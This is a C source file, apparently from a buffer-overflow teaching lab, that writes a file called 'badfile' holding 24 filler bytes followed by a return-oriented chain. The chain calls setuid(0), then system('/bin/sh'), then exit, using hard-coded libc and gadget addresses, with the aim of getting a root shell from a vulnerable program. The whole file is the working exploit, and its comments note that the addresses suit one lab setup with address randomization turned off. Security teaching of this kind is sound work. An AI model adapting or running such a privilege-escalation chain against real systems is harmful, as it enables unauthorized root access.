/* exploit.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define BUF_LEN 24
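/*
 * Write the 80-byte lab input file "./badfile".
 *
 * File layout:
 *   bytes 0 .. BUF_LEN-1 : filler bytes ('A')
 *   bytes BUF_LEN .. 79  : seven slots at an 8-byte stride, each holding one
 *                          long value from the table below
 *
 * NOTE(review): every address in the table is a hard-coded absolute value.
 * They presumably match one specific target binary and libc mapping in the
 * lab environment with address-space randomization disabled; on a system
 * with ASLR/PIE enabled these constants would not be stable. Confirm against
 * the lab setup before relying on the per-slot labels.
 *
 * Returns 0 on success, EXIT_FAILURE if the file cannot be opened, written
 * or closed.
 */
int main(int argc, char **argv)
{
    enum { SLOT_STRIDE = 8, SLOT_COUNT = 7 };

    /* You need to decide the addresses and
       the values for X, Y, Z etc. */
    static const long slots[SLOT_COUNT] = {
        0x0000000000400743, /* pop rdi; ret */
        0,                  /* setuid 0 */
        0x7ffff7ada700,     /* setuid */
        0x0000000000400743, /* pop rdi; ret */
        0x7ffff7b9a177,     /* /bin/sh */
        0x7ffff7a53390,     /* system */
        0x7ffff7a48030,     /* exit */
    };

    /* Zero-initialised so no indeterminate stack bytes can reach the file. */
    char buf[80] = {0};
    FILE *badfile;

    (void)argc;
    (void)argv;

    /* Binary mode: the buffer is raw bytes, not text. */
    badfile = fopen("./badfile", "wb");
    if (badfile == NULL) {
        perror("fopen ./badfile");
        return EXIT_FAILURE;
    }

    memset(buf, 'A', BUF_LEN);

    /*
     * memcpy instead of storing through a cast (long *): BUF_LEN is 24, so
     * the slots are not guaranteed to be suitably aligned for long, and the
     * cast store also violates strict aliasing. BUF_LEN + SLOT_COUNT *
     * SLOT_STRIDE is exactly sizeof(buf), so the last slot ends at the end
     * of the buffer.
     */
    for (int i = 0; i < SLOT_COUNT; i++) {
        memcpy(&buf[BUF_LEN + i * SLOT_STRIDE], &slots[i], sizeof slots[i]);
    }

    if (fwrite(buf, sizeof(buf), 1, badfile) != 1) {
        perror("fwrite ./badfile");
        fclose(badfile);
        return EXIT_FAILURE;
    }

    /* fclose flushes buffered data, so a failure here means a short file. */
    if (fclose(badfile) != 0) {
        perror("fclose ./badfile");
        return EXIT_FAILURE;
    }

    return 0;
}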